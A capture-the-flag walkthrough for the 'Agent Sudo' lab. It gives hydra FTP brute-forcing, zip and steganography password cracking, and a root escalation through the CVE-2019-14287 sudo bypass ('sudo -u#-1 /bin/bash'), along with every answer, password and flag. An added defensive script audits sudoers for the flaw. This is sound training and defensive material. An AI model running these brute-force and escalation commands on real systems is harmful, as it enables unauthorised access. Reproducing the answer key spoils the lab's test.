# Agent Sudo

## INIT

```
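# Target IP for this room instance
export agentsudo=10.10.172.140
ping -c 4 "$agentsudo"

# Map a hostname to the target (run as root to append to /etc/hosts)
echo "$agentsudo agentsudo.thm" >> /etc/hosts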
```

## Task 2 Enumerate

```
nmap -v -sC -sV -O -T5 -p1-65535 agentsudo.thm
```

### How many open ports?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzN2zeJqJ8HccYgT3l%2F-MRzOHlAMxaL6Pg8OMEM%2Fimage.png?alt=media\&token=258d06cd-c40b-483e-86a3-adf0f087258d)

{% hint style="success" %}
3
{% endhint %}

### How you redirect yourself to a secret page?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzN2zeJqJ8HccYgT3l%2F-MRzNgB120bP97Z6AJWP%2Fimage.png?alt=media\&token=061e9fcc-fdc7-49ea-987a-4c866003b328)

> Switch User-Agent to C

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzOIu5hPL3qbYiCJ40%2F-MRzS12sqCEliMZfZmNS%2Fimage.png?alt=media\&token=e70ff114-3452-4325-ae3c-cac0b8ef91bd)

{% hint style="success" %}
User-Agent
{% endhint %}

### What is the agent name?

{% hint style="success" %}
Chris
{% endhint %}

## Task 3 Hash cracking and brute-force

### FTP password

```
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agentsudo.thm -t 50
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzT3pPN_US9LhWkYK0%2Fimage.png?alt=media\&token=b108bb31-2b17-4281-9064-2941144ce462)

{% hint style="success" %}
crystal
{% endhint %}

### Zip file password

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzTfi78sFefcOISnJz%2Fimage.png?alt=media\&token=ab5f4fe5-1300-4c7f-a205-60293517b6d1)

```
binwalk -e cutie.png

zip2john 8702.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzWwMoqIUHeV1Eps1v%2Fimage.png?alt=media\&token=0601584d-c8b7-413e-8115-09fc303758b0)

{% hint style="success" %}
alien
{% endhint %}

### steg password

```
steghide extract -sf cute-alien.jpg
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzSanj7EZlOwIP7kFe%2F-MRzXQTngm_uMU3iH18i%2Fimage.png?alt=media\&token=13de7365-28c2-4e3b-be90-6d9da0056c83)

{% hint style="success" %}
Area51
{% endhint %}

### Who is the other agent (in full name)?

{% hint style="success" %}
james
{% endhint %}

### SSH password

{% hint style="success" %}
hackerrules!
{% endhint %}

## Task 4 Capture the user flag

### What is the user flag?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzYqoZ-kJA9QpYMqYO%2F-MRzZ-jpHTKKG3GaEHAu%2Fimage.png?alt=media\&token=5002476f-85b1-4cd8-8561-c574ffe068bd)

{% hint style="success" %}
b03d975e8c92a7c04146cfa7a5a313c7
{% endhint %}

### What is the incident of the photo called?

```
scp james@agentsudo.thm:/home/james/Alien_autospy.jpg .
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzZ6ljuWjW9zwqBNYC%2F-MRz_ZcSfyEDQdrqKPRa%2Fimage.png?alt=media\&token=865968bd-04c7-4c69-b078-3383bb6a6291)

{% hint style="success" %}
Roswell Alien Autopsy
{% endhint %}

## Task 5 Privilege escalation

```
sudo -l
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzaZyVEw4Ax_Wl5TlK%2Fimage.png?alt=media\&token=1c033f7c-a227-4e64-bab8-d4cf11e81038)

### CVE number for the escalation

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzbDqrR5OTTf3FlFa1%2Fimage.png?alt=media\&token=cc0a5e05-bd93-4f1d-9dc4-91d49a597214)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRz_aWHlrYxzuE_eoC0%2F-MRzaSDYxBx8-r0et703%2Fimage.png?alt=media\&token=0e796172-b48f-4650-a657-f9ce30c98120)

{% hint style="success" %}
CVE-2019-14287
{% endhint %}

### What is the root flag?

```
sudo -u#-1 /bin/bash
cat /root/root.txt
```

{% hint style="success" %}
b53a02f55b57d4439e3341834d70c062
{% endhint %}
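
From the defender's side, CVE-2019-14287 only applies when two conditions hold together: a sudo release older than 1.8.28 and a Runas list that combines `ALL` with an exclusion of root. The following added example (not part of the original write-up) checks both; the sample sudoers text, the version strings and the function names are constructed for illustration.

```bash
#!/bin/sh
# Added example: defensive audit for CVE-2019-14287 exposure.

# Exit 0 when sudo version $1 predates 1.8.28, the release carrying the fix.
sudo_version_vulnerable() {
    printf '%s\n' "$1" | awk '{
        sub(/[^0-9.].*/, "")                 # 1.8.21p2 -> 1.8.21
        split($0, p, ".")
        old = (p[1]+0 < 1) || (p[1]+0 == 1 && (p[2]+0 < 8 || (p[2]+0 == 8 && p[3]+0 < 28)))
        exit (old ? 0 : 1)
    }'
}

# Print sudoers rules (stdin) whose Runas user list holds ALL plus a negated root.
find_runas_all_not_root() {
    awk '
        /^[ \t]*(#|$)/ { next }              # skip comments and blank lines
        match($0, /\([^)]*\)/) {
            runas = substr($0, RSTART + 1, RLENGTH - 2)
            sub(/:.*/, "", runas)            # drop the Runas group part
            gsub(/[ \t]/, "", runas)
            runas = "," runas ","
            if (index(runas, ",ALL,") && (index(runas, ",!root,") || index(runas, ",!#0,")))
                print
        }'
}

# $1 = sudo version (on a host: sudo -V | awk 'NR==1{print $3}'), sudoers on stdin.
audit_cve_2019_14287() {
    hits=$(find_runas_all_not_root)
    if [ -z "$hits" ]; then
        echo "OK: no Runas list combining ALL with an exclusion of root"
    elif sudo_version_vulnerable "$1"; then
        printf 'EXPOSED (sudo %s): %s\n' "$1" "$hits"
    else
        printf 'PATCHED (sudo %s), review rule anyway: %s\n' "$1" "$hits"
    fi
}

# Constructed sample input, not taken from the target machine.
SAMPLE_SUDOERS='# constructed sample
root ALL=(ALL:ALL) ALL
james ALL=(ALL, !root) /bin/bash
backup ALL=(operator) /usr/bin/rsync'

printf '%s\n' "$SAMPLE_SUDOERS" | audit_cve_2019_14287 "1.8.21p2"
```

Upgrading sudo to 1.8.28 or later closes the bypass; replacing the `!root` exclusion with an explicit list of permitted Runas users removes the fragile rule itself.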

### (Bonus) Who is Agent R?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MRzbWyNiI0NUhykdEdG%2F-MRzbm-8ek-rZtt4faBl%2Fimage.png?alt=media\&token=1f26731e-af42-44ad-8103-37a6e15781f1)

{% hint style="success" %}
DesKel
{% endhint %}
